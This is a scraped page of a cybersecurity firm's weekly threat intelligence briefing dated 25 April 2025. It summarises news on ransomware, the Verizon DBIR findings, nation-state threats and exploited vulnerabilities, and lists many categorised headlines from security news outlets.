USAID decides not to collect former workers’ abandoned devices | The Verge
End users can code with AI, but IT must be wary | TechTarget
CIOs Say Security Systems Not Delivering Value For Money, Too Complex To Manage - IT Security Guru
MoD publishes Secure by Design problem book to bolster cyber resilience | UKAuthority
Other News
Why SMEs can no longer afford to ignore cyber risk - Help Net Security
Enterprises Need to Beware of These 5 Threats
Cyber security vendors are themselves under attack by hackers, SentinelOne says | CyberScoop
You're Probably Not Taking Cyber Security Seriously Enough - Above the Law
Study: 90% of bankers see need to increase spending on cyber security
Cyber Security in the UK - House of Commons Library
The 3 biggest cyber security threats to small businesses | Malwarebytes
Cyber defenders need to remember their adversaries are human, says Trellix research head | IT Pro
European Council: No cyber attack in Spain-Portugal blackout - Shafaq News
Getting Physical with Cyber Security - Security Boulevard
7 network security myths that make you less secure
How working from home made Britain vulnerable to cyber attackers
It’s Time to Prioritize Cyber Security Education - Security Boulevard
Cyber Threats Loom Large Over US Space Systems, Warns Pentagon Official - ClearanceJobs
Just 60 Seconds From Attacked To Hacked — The Speed Of Cyber Crime
How to Strengthen Cyber Security in Public Safety and Prevent Downtime
The threats to Britain’s food security can no longer be downplayed
A Windows security developer says this is the biggest threat to your PC | PCWorld
Vulnerability Management
Most critical vulnerabilities aren't worth your attention - Help Net Security
Hackers exploited 75 zero-days last year – Google | Cybernews
44% of the zero-days exploited in 2024 were in enterprise solutions - Help Net Security
Google: Governments are using zero-day hacks more than ever - Ars Technica
How Breaches Start: Breaking Down 5 Real Vulns
CVE board 'kept in the dark' on funding, members say • The Register
Solana DeFi protocol Loopscale hit with $5.8 million exploit two weeks after launch | The Block
CIOs Say Security Systems Not Delivering Value For Money, Too Complex To Manage - IT Security Guru
Vulnerabilities
Google Issues Emergency Chrome Security Update — Act Now
Experts forecast Ivanti VPN attacks as endpoint scans surge • The Register
SAP fixes suspected Netweaver zero-day exploited in attacks
Chrome 136, Firefox 138 Patch High-Severity Vulnerabilities - SecurityWeek
SonicWall Confirms Active Exploitation of Flaws Affecting Multiple Appliance Models
Airplay-enabled devices open to attack via "AirBorne" vulnerabilities - Help Net Security
CISOs should re-consider using Microsoft RDP due to password flaw, says expert | CSO Online
Hackers Exploit Critical Craft CMS Flaws; Hundreds of Servers Likely Compromised
Craft CMS RCE exploit chain used in zero-day attacks to steal data
Coinbase fixes 2FA log error making people think they were hacked
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 25 April 2025
Black Arrow Cyber Threat Intelligence Briefing 25 April 2025:
-Cyber Security Is Now Critical for Business Growth, CEOs Say
-Cyber Threats Now a Daily Reality for One in Three Businesses
-66% of CISOs Are Worried Cyber Security Threats Surpass Their Defences
-M&S: Shares at FTSE 100 Retailer Fall as Cyber Attack Hits Customers
-Verizon DBIR: Small Businesses Bearing the Brunt of Ransomware Attacks
-Cyber Attacks Surged in 2025, with Third Party Attacks Seeing a Huge Rise
-Nation-State Threats Put SMBs in Their Sights
-Global Firms Succumb to Ransomware: 86% Pay Up Despite Having Advanced Backup Tools
-Dutch Intelligence Report: Russia’s Sabotage in Europe Borders on State Terrorism
-Cyber Crime Syndicates Expand Beyond Southeast Asia, UN Warns of Global Threat
-159 Vulnerabilities Exploited in Q1 2025 — 28% Within 24 Hours of Disclosure
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Exec Summary
Black Arrow Cyber’s review of specialist and general media has observed a significant shift in executive mindsets, with cyber security now seen as essential to business growth, not just a defensive measure. This includes reports of CEOs increasingly recognising the strategic value of robust security practices, particularly amid rising concerns over AI-driven threats. However, there remains a concerning gap between CISOs and the wider C-suite regarding the severity of risks, underlining the need for stronger alignment at leadership level.
This week’s reporting also highlights that cyber threats have become a daily operational reality, with small and medium-sized businesses bearing a disproportionate share of ransomware and nation-state attacks. Third-party vulnerabilities and supply chain compromises are escalating rapidly, exposing organisations to breaches through trusted partners. Black Arrow Cyber believes this growing complexity demands that businesses urgently reassess their resilience strategies and third-party risk management.
Finally, we note that ransomware attacks continue to overwhelm organisations, with high ransom payment rates despite advanced backup tools. Rapid exploitation of newly disclosed vulnerabilities, particularly in widely used systems, further compounds the threat landscape. Black Arrow believes that operational readiness, strong identity management, and swift vulnerability patching are now critical pillars for cyber resilience.
Top Cyber Stories of the Last Week
Cyber Security Is Now Critical for Business Growth, CEOs Say
A Gartner study has found that 85% of CEOs now view cyber security as critical to business growth in today’s digital and connected world. Three in five (61%) are concerned about cyber security threats, particularly with the rise of artificial intelligence influencing the threat landscape. The report highlights a shift in risk thresholds and underlines that cyber security has become a core business priority rather than simply a protective measure. CEOs are urged to champion the role of security leaders, while security leaders must demonstrate how effective cyber security strategies can safeguard assets and drive strategic growth.
Cyber Threats Now a Daily Reality for One in Three Businesses
FIS and Oxford Economics report that one in three businesses face daily cyber threats, 74% encounter critical incidents monthly and 88% of leaders cited cyber threats as a major disruption. Despite prioritising fraud risk management, over half of firms were dissatisfied with their fraud response plans, and nearly half do not regularly train employees on fraud and cyber awareness, leaving them exposed to greater risk.
66% of CISOs Are Worried Cyber Security Threats Surpass Their Defences
EY has found a growing disconnect between CISOs and the wider C-suite when it comes to cyber security threats. Two-thirds of CISOs fear threats now surpass their defences, compared to just over half of their C-suite peers. The report highlights that CISOs are more concerned than the rest of the C-suite about senior leaders at their organisation underestimating the dangers of cybersecurity threats (68% vs. 57%) and note a higher incidence of attacks from both cyber criminals and insider threats. Encouragingly, 75% of CISOs reported fewer incidents following investment in AI. C-suite leaders expect cyber security budgets to double next year, from 21% to 38% of total IT spend.
M&S: Shares at FTSE 100 Retailer Fall as Cyber Attack Hits Customers
Marks & Spencer (M&S) has confirmed it is managing a cyber attack that has disrupted contactless payments and forced the retailer to stop taking online orders amid a payments meltdown. As a result, shares have fallen by more than 4%. While stores remain open, M&S has temporarily moved some operations offline to protect customers and partners. Online orders have been suspended, but cash payments are still being accepted. The retailer is working with industry experts to restore full services and minimise further disruption.
Verizon DBIR: Small Businesses Bearing the Brunt of Ransomware Attacks
Verizon’s latest Data Breach Investigations Report (DBIR) highlights that small businesses are bearing the brunt of ransomware attacks, with extortion malware found in 88% of breaches compared to 39% at larger firms. Ransomware was involved in 44% of all breaches, a 37% rise from the previous year with attack volumes increasing globally. State-sponsored actors are also increasingly deploying ransomware, with financial motives present in 28% of their incidents. Industries such as administration, wholesale trade, and transportation remain key targets for financially motivated cyber attacks.
Cyber Attacks Surged in 2025, with Third Party Attacks Seeing a Huge Rise
Verizon’s latest Data Breach Investigations Report also found that third-party involvement in cyber attacks has doubled, now featuring in 30% of cases. Based on over 22,000 security incidents and 12,195 confirmed data breaches, the research highlights a sharp rise in supply chain and partner ecosystem compromises. Cyber criminals increasingly target open-source code repositories to push malicious updates or impersonate legitimate software packages. The findings underline the growing risk third parties pose to organisations’ cyber security, with trust in external partners becoming a significant vulnerability.
Nation-State Threats Put SMBs in Their Sights
Nation-state cyber threat groups are increasingly targeting small and medium-sized businesses (SMBs), particularly those linked to larger organisations. Broadcom warns that most nation-state attacks now impact the private sector and midmarket firms, with identity providers among common targets. Many SMBs remain unaware of their role in the broader supply chain, making them attractive entry points. Nation-state actors are also seen moonlighting, switching between espionage and financially motivated cyber attacks. Experts stress that SMBs must strengthen their cyber defences, as they face the same sophisticated threats once reserved for larger enterprises.
Global Firms Succumb to Ransomware: 86% Pay Up Despite Having Advanced Backup Tools
Rubrik’s latest research shows that 86% of global organisations paid ransom demands last year, despite having access to advanced backup tools. The report highlights that 74% of firms experienced partial compromise of their backup systems, with 35% suffering complete compromise, often due to attackers disabling recovery infrastructure before encrypting data. Nearly 80% of breaches were driven by stolen identities, particularly exploiting legacy systems like Active Directory. Average ransom payments globally are around $479,000. The findings stress that true resilience requires not just technology, but operational readiness and leadership commitment to recovery preparedness.
Dutch Intelligence Report: Russia’s Sabotage in Europe Borders on State Terrorism
The Dutch Intelligence services (AIVD) have reported a sharp rise in Russian aggression across Europe in 2024, including espionage, cyber attacks, and disinformation campaigns described as bordering on state terrorism. A Dutch public facility was targeted by Russian hackers, and overall national threats increased, with 73 official reports issued - up from 56 in 2023. The report also flagged escalating extremist threats, including right-wing and jihadist violence, some involving very young individuals. China was identified as another major threat, targeting Dutch military research and supplying military goods to Russia. The AIVD warned that international conflicts are increasingly fuelling domestic instability.
Cyber Crime Syndicates Expand Beyond Southeast Asia, UN Warns of Global Threat
The United Nations has warned that cybercrime syndicates originating in Southeast Asia are now operating on a global scale, generating billions in scam profits each year. Despite law enforcement crackdowns, these groups have expanded into Africa, South America, and South Asia, moving operations to regions with weak governance. The UN reports that these networks use online platforms and cryptocurrency to scale operations, targeting victims in over 50 countries. In 2023 alone, the US reported losses of over $5.6 billion to cryptocurrency scams. Without international collaboration, the scale and impact of cyber fraud will continue to escalate.
159 Vulnerabilities Exploited in Q1 2025 — 28% Within 24 Hours of Disclosure
VulnCheck has reported that 159 vulnerabilities were exploited in the first quarter of 2025, with 28% targeted within just one day of disclosure. Most affected systems were content management platforms, network edge devices, and operating systems. Microsoft Windows, Broadcom VMware, and TOTOLINK routers were among the most impacted products. Verizon’s 2025 Data Breach Investigations Report noted a 34% rise in breaches initiated through vulnerability exploitation, now accounting for 20% of all incidents.
Sources:
https://www.techradar.com/pro/security/cybersecurity-is-now-critical-for-business-growth-ceos-say
https://www.helpnetsecurity.com/2025/04/21/businesses-fraud-consequence/
https://www.cityam.com/ms-shares-at-ftse-100-retailer-fall-as-cyber-attack-hits-customers/
https://www.infosecurity-magazine.com/news/verizon-dbir-smb-ransomware-attacks/
https://www.darkreading.com/threat-intelligence/nation-state-threats-smb
https://thehackernews.com/2025/04/159-cves-exploited-in-q1-2025-283.html
Governance, Risk and Compliance
66% of CISOs are worried cyber security threats surpass their defenses | Security Magazine
The Role of Threat Intelligence in Proactive Defense
Compliance weighs heavily on security and GRC teams - Help Net Security
Cyber threats now a daily reality for one in three businesses - Help Net Security
Cyber security is now critical for business growth, CEOs say | TechRadar
Cybersecurity Metrics That Matter for Board-Level Reporting
Cybersecurity Controls: What Do Regulators Expect Nowadays? | Alston & Bird - JDSupra
Why CISOs and CTOs Must Collaborate More Than Ever in Today’s Security Landscape
Nine of 10 global firms hit by cyber attacks – report | Insurance Business America
Exclusive: Small businesses under-prepared amid restructuring push
Businesses Failing to Prevent Cyber Attacks, Says Report
The C-suite gap that's putting your company at risk - Help Net Security
Veeam Report Finds Close to 70% of Organizations Still Under Cyber-Attack Despite Improved Defenses
Enterprises change how they manage cyber risk
From Reactive to Predictive - The Next Frontier for Security Leaders
Staying Ahead of Cyber Threats with Cyber Resilience | Dell USA
Beyond Compliance - How VPs of Security Drive Strategic Cybersecurity Initiatives
Not if, but when -- Why every organization needs a cyber resilience strategy
Threats
Ransomware, Extortion and Destructive Attacks
Verizon discovers spike in ransomware and exploited vulnerabilities | CyberScoop
Ransomware, espionage and data breaches? Yep – Verizon just dropped a 117-page thriller - PhoneArena
Verizon DBIR: Small Businesses Bearing the Brunt of Ransomware Attacks - Infosecurity Magazine
Could Ransomware Survive Without Cryptocurrency?
Ransomware Gangs Innovate With New Affiliate Models
Global firms succumb to ransomware: 86% pay up despite having advanced backup tools | CSO Online
The Ransomware Business Model: The State of Cyber Crime | Silicon UK Tech News
Ransomware activity trends | Professional Security Magazine
Interlock ransomware gang pushes fake IT tools in ClickFix attacks
Teach young people about ransomware risks before they enter work, expert urges | The Standard
Credential theft outpaces ransomware as cyber threat landscape evolves, report claims
Ransomware Gang Takes Page From Elon's 'What Did You Do This Week' DOGE Emails
Ransomware the most pervasive threat to US critical infrastructure in 2024, says FBI | CSO Online
Emulating the Hellish Helldown Ransomware - Security Boulevard
What is Ransomware? Definition and Complete Guide | Informa TechTarget
Ransomware Victims
Ransomware Gang Claims Attack On Manchester Credit Union
3 More Healthcare Orgs Hit by Ransomware Attacks
Interlock ransomware claims DaVita attack, leaks stolen data
M&S takes systems offline as 'cyber incident' lingers • The Register (unconfirmed)
Money blog: M&S forced to stop taking online orders amid payment meltdown | Money News | Sky News (unconfirmed)
Phishing & Email Based Attacks
Emails delivering infostealers rose by 84% year-over-year | Security Magazine
The dark side of YouTube: Malicious links, phishing, and deepfakes - Help Net Security
Darcula Adds GenAI to Phishing Toolkit, Lowering the Barrier for Cybercriminals
Windows NTLM Hash Flaw Targeted in Global Phishing Attacks | MSSP Alert
Beware, hackers can apparently now send phishing emails from “no-reply@google.com” | TechRadar
Phishing for Codes: Russian Threat Actors Target Microsoft 365 OAuth Workflows | Volexity
Pope Francis’ Passing Triggers Surge Of Phishing, SEO Poisoning, And Fake Images
A new kind of phishing attack is fooling Gmail’s security. Here’s how it works | Laptop Mag
DPRK Hackers Steal $137M from TRON Users in Single-Day Phishing Attack
Cover-Up Culture? 95% of Phishing Attacks Go Unreported in Healthcare, New Paubox Report Reveals
Who needs phishing when your login's already in the wild? • The Register
Business Email Compromise (BEC)/Email Account Compromise (EAC)
FBI: Cybercrime cost victims 'staggering' $16.6B last year • The Register
Other Social Engineering
Cyber criminals blend AI and social engineering to bypass detection - Help Net Security
The dark side of YouTube: Malicious links, phishing, and deepfakes - Help Net Security
State-sponsored hackers embrace ClickFix social engineering tactic
'Elusive Comet' Attackers Use Zoom to Swindle Victims
Deepfake Impersonations: Your CEO’s Voice as a Threat Vector | MSSP Alert
State-sponsored actors spotted using ClickFix hacking tool developed by criminals | TechRadar
Pope Francis’ Passing Triggers Surge Of Phishing, SEO Poisoning, And Fake Images
North Korean Operatives Use Deepfakes in IT Job Interviews
Fraud, Scams and Financial Crime
FBI: Cyber Crime cost victims 'staggering' $16.6B last year • The Register
Deepfake Impersonations: Your CEO’s Voice as a Threat Vector | MSSP Alert
$40bn Southeast Asian Scam Sector Growing “Like a Cancer” - Infosecurity Magazine
Attackers, Defenders Lean on AI in Identity Fraud Battle
'Elusive Comet' Attackers Use Zoom to Swindle Victims
Japan ’s FSA warns of unauthorized trades via stolen credentials from fake security firms' sites
WordPress ad-fraud plugins generated 1.4 billion ad requests per day
“Scallywag” Scheme Monetizing Piracy Through Browser Extensions
Pope Francis’ Passing Triggers Surge Of Phishing, SEO Poisoning, And Fake Images
Microsoft warns users about AI-Driven scams that target Quick Assist - gHacks Tech News
This Android malware drains cards with a single tap | Cybernews
UK Romance Scams Spike 20% as Online Dating Grows - Infosecurity Magazine
The Evolution of Cyber Crime: How to Stay Safe from AI-Driven Fraud | StoneTurn - JDSupra
Microsoft warns of AI-powered scam surge
The Cyber Criminals Who Organized a $243 Million Crypto Heist - The New York Times
Scammers Are Impersonating the FBI. Here's How To Spot Them - CNET
Artificial Intelligence
Cyber criminals blend AI and social engineering to bypass detection - Help Net Security
Darcula Adds GenAI to Phishing Toolkit, Lowering the Barrier for Cybercriminals
Bot Traffic Surpasses Humans Online—Driven by AI and Criminal Innovation - SecurityWeek
DeepSeek Breach Opens Floodgates to Dark Web
The AI market does not understand AI safety | TechTarget
Rethinking Resilience for the Age of AI-Driven Cyber Crime - Infosecurity Magazine
Attackers, Defenders Lean on AI in Identity Fraud Battle
Why CISOs are watching the GenAI supply chain shift closely - Help Net Security
Microsoft warns users about AI-Driven scams that target Quick Assist - gHacks Tech News
Identity is under siege as AI and cyber exploits evolve and outpace defenses | Biometric Update
The Evolution of Cyber Crime: How to Stay Safe from AI-Driven Fraud | StoneTurn - JDSupra
Microsoft warns of AI-powered scam surge
Slopsquatting: The worrying AI hallucination bug that could be spreading malware | Tom's Guide
The Shadow AI Surge: Study Finds 50% of Workers Use Unapproved AI Tools - SecurityWeek
Anthropic finds alarming 'emerging trends' in Claude misuse report | ZDNET
2FA/MFA
'SessionShark' ToolKit Evades Microsoft Office 365 MFA
Malware
Emails delivering infostealers rose by 84% year-over-year | Security Magazine
Russian Bulletproof Hosting Provider Proton66 Linked To Global Cyber Attack Surge
Hackers Abuse Russian Bulletproof Host Proton66 for Global Attacks and Malware Delivery
Chinese APT Mustang Panda Debuts 4 New Attack Tools
Multi-Stage Malware Attack Uses .JSE and PowerShell to Deploy Agent Tesla and XLoader
The dark side of YouTube: Malicious links, phishing, and deepfakes - Help Net Security
The Zoom attack you didn't see coming - Help Net Security
'Elusive Comet' Attackers Use Zoom to Swindle Victims
Slopsquatting: The worrying AI hallucination bug that could be spreading malware | Tom's Guide
Rootkit bypasses most Linux security detection | Cybernews
Linux io_uring PoC Rootkit Bypasses System Call-Based Threat Detection Tools
Chinese hackers target Russian govt with upgraded RAT malware
Iran-Linked Hackers Target Israel with MURKYTOUR Malware via Fake Job Campaign
Korean Telco Giant SK Telecom Hacked - SecurityWeek
Your cat’s microchip could carry malware | Cybernews
Bots/Botnets
Bot Traffic Surpasses Humans Online—Driven by AI and Criminal Innovation - SecurityWeek
Unmasking the Dead Internet: How bots and propaganda hijacked online discourse
Mobile
New Android malware steals your credit cards for NFC relay attacks
Leaking Apps: The Hidden Data Risks On Your Phone
New Android Warning — This TOAD Malware Attack Steals Cash From ATMs
Flexible working models fuel surge in device theft - Help Net Security
Russian army targeted by new Android malware hidden in mapping app
Denial of Service/DoS/DDoS
Dutch payment processor Adyen hit by three DDoS attacks | NL Times
Internet of Things – IoT
Opt out: how to protect your data and privacy if you own a Tesla | Tesla | The Guardian
Data Breaches/Leaks
Thousands of UK users of Vinted, Candy Crush and Tinder were hit in global hack
DeepSeek Breach Opens Floodgates to Dark Web
US Data Breach Victim Count Surges 26% Annually - Infosecurity Magazine
Data breach class action costs mount up | Computer Weekly
CISA Weighs In on Alleged Oracle Cloud Breach
3 More Healthcare Orgs Hit by Ransomware Attacks
5.5 Million Patients Affected by Data Breach at Yale New Haven Health - SecurityWeek
Blue Shield shared 4.7M people's health info with Google Ads • The Register
Hackers claim TikTok breach, 927,000 passwords might hit the internet | Cybernews
Korean Telco Giant SK Telecom Hacked - SecurityWeek
Organised Crime & Criminal Actors
Russian Bulletproof Hosting Provider Proton66 Linked To Global Cyberattack Surge
Cyber Crime Syndicates Expand Globally From Southeast Asia: UN
Hackers Abuse Russian Bulletproof Host Proton66 for Global Attacks and Malware Delivery
$40bn Southeast Asian Scam Sector Growing “Like a Cancer” - Infosecurity Magazine
Russian Infrastructure Plays Crucial Role in North Korean Cyber Crime Operations | Trend Micro (US)
Hacking groups are now increasingly in it for the money, not the chaos | TechRadar
When confusion becomes a weapon: How cyber criminals exploit economic turmoil - Help Net Security
The Evolution of Cyber Crime: How to Stay Safe from AI-Driven Fraud | StoneTurn - JDSupra
Microsoft warns of AI-powered scam surge
Scattered Spider Hacking Suspect Extradited to US From Spain
'Cyber crime ranks as No 1 risk in SA, overtaking long-standing issues': expert
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
More Than a Quarter of Bybit's Hacked Crypto Is Now Untraceable
Could Ransomware Survive Without Cryptocurrency?
The Cybercriminals Who Organized a $243 Million Crypto Heist - The New York Times
DPRK Hackers Steal $137M from TRON Users in Single-Day Phishing Attack
Web3, cryptocurrency sectors targeted by North Korean hackers | SC Media
North Korean cyber spies created U.S. firms to dupe crypto developers | Reuters
Insider Risk and Insider Threats
Teach young people about ransomware risks before they enter work, expert urges | The Standard
The Foundations of a Resilient Cyber Workforce
Supply Chain and Third Parties
Cyber attacks surged in 2025, with third party attacks seeing a huge rise | TechRadar
Security snafus caused by third parties up from 15% to 30% • The Register
Why CISOs are watching the GenAI supply chain shift closely - Help Net Security
Cloud/SaaS
Microsoft Purges Millions of Cloud Tenants After Storm-0558
Phishing for Codes: Russian Threat Actors Target Microsoft 365 OAuth Workflows | Volexity
Enterprises are facing a ‘cloud security crisis’ | IT Pro
Hackers abuse OAuth 2.0 workflows to hijack Microsoft 365 accounts
'SessionShark' ToolKit Evades Microsoft Office 365 MFA
Widespread Microsoft Entra lockouts tied to new security feature rollout
CISA Weighs In on Alleged Oracle Cloud Breach
Outages
Widespread Microsoft Entra lockouts tied to new security feature rollout
Wait, how did a decentralized service like Bluesky go down? | TechCrunch
Identity and Access Management
Identity is under siege as AI and cyber exploits evolve and outpace defenses | Biometric Update
Widespread Microsoft Entra lockouts tied to new security feature rollout
Encryption
Hackers Weaponizing Certificates & Stolen Private Keys to Infiltrate Organizations
New Android Warning — This TOAD Malware Attack Steals Cash From ATMs
Telegram vows to exit markets over encryption backdoor demands
Linux and Open Source
Open Source and Container Security Are Fundamentally Broken - The New Stack
Rootkit bypasses most Linux security detection | Cybernews
Linux io_uring PoC Rootkit Bypasses System Call-Based Threat Detection Tools
Passwords, Credential Stuffing & Brute Force Attacks
Credential theft outpaces ransomware as cyber threat landscape evolves, report claims
Vulnerability Exploitation and Credential Theft Now Top Initial Access - Infosecurity Magazine
Who needs phishing when your login's already in the wild? • The Register
7 Steps to Take After a Credential-Based cyberattack
Phishers Exploit Google Sites and DKIM Replay to Send Signed Emails, Steal Credentials
Social Media
The dark side of YouTube: Malicious links, phishing, and deepfakes - Help Net Security
Wait, how did a decentralized service like Bluesky go down? | TechCrunch
LinkedIn adds new verification tool to ensure security across the internet | TechRadar
Hackers claim TikTok breach, 927,000 passwords might hit the internet | Cybernews
Training, Education and Awareness
Teach young people about ransomware risks before they enter work, expert urges | The Standard
The Foundations of a Resilient Cyber Workforce
Regulations, Fines and Legislation
Compliance weighs heavily on security and GRC teams - Help Net Security
Cyber Security Controls: What Do Regulators Expect Nowadays? | Alston & Bird - JDSupra
Challenges persist as UK’s Cyber Security and Resilience Bill moves forward | Computer Weekly
Assessing The Impact Of The UK's Proposed Cyber Resilience Bill
EU Bolsters Cybersecurity With NIS2 Directive
Governance code of practice | Professional Security Magazine
The Wiretap: Trump’s Cyber Security Agency Avoided A Near Disaster
US cyber defences are being dismantled from the inside • The Register
Holyrood | Ofcom closes legal loophole that allowed criminals to track your location
Leasing of Global Titles banned | Professional Security Magazine
The splintering of a standard bug tracking system has begun • The Register
Why the MITRE CVE Database Scare Proves Multi-Source Vulnerability Intelligence Is Essential
Bill introduced to extend the Cybersecurity Information Sharing Act | Security Magazine
Two top cyber officials resign from CISA | The Record from Recorded Future News
2025 State Cybersecurity Legislation Focuses on Financial Services | Alston & Bird - JDSupra
Zambia's Updated Cyber Laws Prompt Surveillance Warnings
Top intelligence lawmaker fears China may exploit DOGE’s changes to government - Nextgov/FCW
Telegram vows to exit markets over encryption backdoor demands
Models, Frameworks and Standards
Assessing The Impact Of The UK's Proposed Cyber Resilience Bill
EU Bolsters Cybersecurity With NIS2 Directive
Governance code of practice | Professional Security Magazine
MITRE Launches New D3FEND CAD Tool to Create Precise Cybersecurity Scenarios
Mapping The Cyber Kill Chain Using Correlated Security Logs And Timeline Tools
Careers, Working in Cyber and Information Security
Switching to Cyber Security: Advice for Midcareer Professionals
Two ways AI hype is worsening the cyber security skills crisis | CSO Online
Cyber ‘agony aunts’ launch guidebook for women in security | Computer Weekly
Law Enforcement Action and Take Downs
Scattered Spider Hacking Suspect Extradited to US From Spain
Misinformation, Disinformation and Propaganda
Unmasking the Dead Internet: How bots and propaganda hijacked online discourse
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Ransomware, espionage and data breaches? Yep – Verizon just dropped a 117-page thriller - PhoneArena
Dutch intelligence report: Russia’s sabotage in Europe borders on state terrorism | NL Times
Cyber threats target F-35 in new era of military defense risks
The state of cyberwar in Ukraine — and how CISOs can help | CSO Online
Countries shore up digital defenses as tensions raise the threat of cyberwarfare - ABC News
Nation State Actors
Nation-State Threats Put SMBs in Their Sights
State-sponsored actors spotted using ClickFix hacking tool developed by criminals | TechRadar
China
Chinese APT Mustang Panda Debuts 4 New Attack Tools
How Chinese hacking got so good
Chinese Ghost Hackers Hit Hospitals And Factories In America And U.K.
Microsoft Purges Millions of Cloud Tenants After Storm-0558
Chinese hackers target Russian govt with upgraded RAT malware
Earth Kurma APT Campaign Targets Southeast Asian Government Telecom Sectors | Trend Micro (US)
DeepSeek Breach Opens Floodgates to Dark Web
Top intelligence lawmaker fears China may exploit DOGE’s changes to government - Nextgov/FCW
Russia
Dutch intelligence report: Russia’s sabotage in Europe borders on state terrorism | NL Times
State-sponsored hackers embrace ClickFix social engineering tactic
Russian Infrastructure Plays Crucial Role in North Korean Cybercrime Operations | Trend Micro (US)
Russia is ramping up hybrid attacks against Europe, Dutch intelligence says | Reuters
Phishing for Codes: Russian Threat Actors Target Microsoft 365 OAuth Workflows | Volexity
Dutch Warn of “Whole of Society” Russian Cyber-Threat - Infosecurity Magazine
The state of cyberwar in Ukraine — and how CISOs can help | CSO Online
Russia’s Arming For Space War I, Targeting SpaceX Satellite Systems
Chinese hackers target Russian govt with upgraded RAT malware
Russian Bulletproof Hosting Provider Proton66 Linked To Global Cyberattack Surge
Hackers Abuse Russian Bulletproof Host Proton66 for Global Attacks and Malware Delivery
Trojanized Alpine Quest app geolocates Russian soldiers • The Register
Russian army targeted by new Android malware hidden in mapping app
Iran
Iran-Linked Hackers Target Israel with MURKYTOUR Malware via Fake Job Campaign
Israel subjected to persistent targeting by Iranian hackers | SC Media
North Korea
Russian Infrastructure Plays Crucial Role in North Korean Cybercrime Operations | Trend Micro (US)
North Korean Operatives Use Deepfakes in IT Job Interviews
Kimsuky APT exploited BlueKeep RDP flaw in attacks against South Korea and Japan
More Than a Quarter of Bybit's Hacked Crypto Is Now Untraceable
DPRK Hackers Steal $137M from TRON Users in Single-Day Phishing Attack
Web3, cryptocurrency sectors targeted by North Korean hackers | SC Media
Lazarus hackers breach six companies in watering hole attacks
North Korean cyber spies created U.S. firms to dupe crypto developers | Reuters
Tools and Controls
66% of CISOs are worried cyber security threats surpass their defenses | Security Magazine
The Role of Threat Intelligence in Proactive Defense
Cyber security Controls: What Do Regulators Expect Nowadays? | Alston & Bird - JDSupra
Cyber security Metrics That Matter for Board-Level Reporting
Enterprises change how they manage cyber risk
What is Risk Exposure in Business? | Definitions from TechTarget
Phishers Exploit Google Sites and DKIM Replay to Send Signed Emails, Steal Credentials
Chinese APT Mustang Panda Debuts 4 New Attack Tools
Two ways AI hype is worsening the cyber security skills crisis | CSO Online
Rethinking Resilience for the Age of AI-Driven Cybercrime - Infosecurity Magazine
Open Source and Container Security Are Fundamentally Broken - The New Stack
Hackers Weaponizing Certificates & Stolen Private Keys to Infiltrate Organizations
Digital Forensics In 2025: How CSOs Can Lead Effective Investigations
Stronger Cloud Security in Five: How To Protect Your Cloud Workloads - Security Boulevard
Criminals target APIs as web attacks skyrocket globally | IT Pro
Widespread Microsoft Entra lockouts tied to new security feature rollout
7 Steps to Take After a Credential-Based cyberattack
The Foundations of a Resilient Cyber Workforce
From Reactive to Predictive - The Next Frontier for Security Leaders
5 Reasons Device Management Isn't Device Trust
Staying Ahead of Cyber Threats with Cyber Resilience | Dell USA
Not if, but when -- Why every organization needs a cyber resilience strategy
Traditional Networks Are Leaving Organizations Exposed
Coaching AI agents: Why your next security hire might be an algorithm - Help Net Security
Executives think AI can supercharge cyber security teams – analysts aren’t convinced | IT Pro
Exposure validation emerges as critical cyber defense component - Help Net Security
5 Major Concerns With Employees Using The Browser
Microsoft Claims Steady Progress Revamping Security Culture
Cyber Security Indicators: How IOCs, IOBs, and IOAs Empower Threat Detection and Prevention
Mapping The Cyber Kill Chain Using Correlated Security Logs And Timeline Tools
MITRE Launches New D3FEND CAD Tool to Create Precise Cybersecurity Scenarios
Reports Published in the Last Week
Other News
66% of CISOs are worried cybersecurity threats surpass their defenses | Security Magazine
Cyber threats now a daily reality for one in three businesses - Help Net Security
UK utility cyberattacks rose 586% from 2022 to 2023 | Security Magazine
Nine of 10 global firms hit by cyber attacks – report | Insurance Business America
Cyber in financial services study | Professional Security Magazine
The Biggest Security Risks With Public Wi-Fi | HuffPost Life
Verizon DBIR: Small Businesses Bearing the Brunt of Ransomware Attacks - Infosecurity Magazine
A new era of cyber threats is approaching for the energy sector - Help Net Security
New KnowBe4 Report Exposes Critical Cyber Threats in European Energy Sector
Why cyber security matters for small and medium-sized businesses – Computerworld
Exclusive: Small businesses under-prepared amid restructuring push
Adversary-in-the-Middle Attacks Persist – Strategies to Lessen the Impact - Security Boulevard
Two-thirds of cops find NATO summit in The Hague irresponsible | NL Times
Cyber threats escalate against energy sector | SC Media
Understanding 2024 cyber attack trends - Help Net Security
Microsoft Claims Steady Progress Revamping Security Culture
5 Most Common Security Attack Methods in 2024: Mandiant’s M-Trends Report
Cyber attacks Soar 47% Globally – Attacks On Education Increase By 73%
What school IT admins are up against, and how to help them win - Help Net Security
Cyber security in 2025- Real-World Threats and Lessons Learned
Is the automotive industry on the cusp of a cyber war? | Automotive World
Phishing Attacks Lead to Theft in the Shipping Industry | Manufacturing.net
Are maritime hackers pushing at an open door? - Ship Technology
Vulnerability Management
